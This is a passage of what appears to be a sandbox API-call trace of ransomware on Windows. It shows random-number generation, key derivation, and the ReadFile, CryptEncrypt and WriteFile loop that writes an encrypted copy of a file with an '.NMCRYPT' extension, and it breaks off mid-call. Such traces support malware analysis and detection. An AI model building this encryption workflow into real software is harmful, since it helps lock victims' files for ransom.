[0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.979] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0162.980] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0162.980] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0162.980] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.980] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad438) returned 1 [0162.980] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0162.980] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0162.980] wcslen (_String="\\\\?\\") returned 0x4 [0162.980] CryptDuplicateKey (in: hKey=0x9ad438, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad838) returned 1 [0162.980] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Connectivity.gif.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0162.980] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0163.001] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2319) returned 1 [0163.001] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0163.001] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.002] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.002] GetLastError () returned 0x0 [0163.002] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.003] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.003] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.004] GetLastError () returned 0x0 [0163.004] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.004] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.004] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.004] GetLastError () returned 0x0 [0163.004] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.004] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.004] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.004] GetLastError () returned 0x0 [0163.004] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.004] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.004] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.004] GetLastError () returned 0x0 [0163.004] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.004] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.004] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.004] GetLastError () returned 0x0 [0163.004] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.004] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.004] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.004] GetLastError () returned 0x0 [0163.004] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.004] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.004] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.004] GetLastError () returned 0x0 [0163.004] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.005] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.005] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.005] GetLastError () returned 0x0 [0163.005] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | 